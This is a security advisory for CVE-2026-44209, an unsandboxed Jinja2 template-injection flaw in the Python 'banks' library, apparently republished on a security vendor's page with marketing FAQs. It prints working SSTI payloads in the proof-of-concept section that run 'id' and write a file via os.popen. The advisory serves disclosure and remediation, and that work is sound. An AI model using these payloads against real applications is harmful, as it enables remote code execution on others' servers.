Summary
banks <= 2.4.1 uses jinja2.Environment() (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to Prompt() are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system.
This is a vulnerability in how banks initializes its Jinja2 environment, not in Jinja2 itself.
Vulnerable Code
src/banks/env.py, the global Jinja2 environment is created without sandboxing:
env = Environment(
autoescape=select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False),
...
)
Attack Scenario
An application that stores prompt templates in a database, accepts them via an API, or loads them from a user-supplied config file and passes them to Prompt() is vulnerable. For example:
# User-controlled input reaches Prompt()
user_input = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(user_input)
p.text() # Executes arbitrary command on the host
Proof of Concept
Setup:
pip install banks==2.4.1
PoC script:
from banks import Prompt
payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(payload)
result = p.text()
print(f"[+] Output: {result}")
Confirmed output:
[+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),...
text
**File-write proof:**
```python
from banks import Prompt
p = Prompt("{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo POC > /tmp/rce_banks_exec').read() }}")
p.text()
ls -l /tmp/rce_banks_exec
## -rw-rw-r-- 1 ak ak 4 Apr 27 15:36 /tmp/rce_banks_exec
Impact
Applications that allow end-users to supply or customize prompt templates are at risk of full Remote Code Execution, including arbitrary command execution, data exfiltration, and server compromise.
Fix
Fixed in banks 2.4.2 (PR #74) by switching to jinja2.sandbox.SandboxedEnvironment, which blocks the dunder attribute traversal chain this exploit relies on.
Developers on banks <= 2.4.1 should upgrade to 2.4.2 and avoid passing untrusted user input as the template argument to Prompt().
Resources
- Fix: https://github.com/masci/banks/pull/74
- CVE-2024-41950 (Haystack, identical root cause, CVSS 7.5)
- CVE-2025-25362 (spacy-llm, identical root cause)
- CWE-1336: Improper Neutralization of Special Elements in a Template Engine
Impact
CVE-2026-44209 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.4.2); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-44209? CVE-2026-44209 is a high-severity security vulnerability in banks (pip), affecting versions <= 2.4.1. It is fixed in 2.4.2.
- How severe is CVE-2026-44209? CVE-2026-44209 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of banks are affected by CVE-2026-44209? banks (pip) versions <= 2.4.1 is affected.
- Is there a fix for CVE-2026-44209? Yes. CVE-2026-44209 is fixed in 2.4.2. Upgrade to this version or later.
- Is CVE-2026-44209 exploitable, and should I be worried? Whether CVE-2026-44209 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-44209 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-44209? Upgrade
banksto 2.4.2 or later.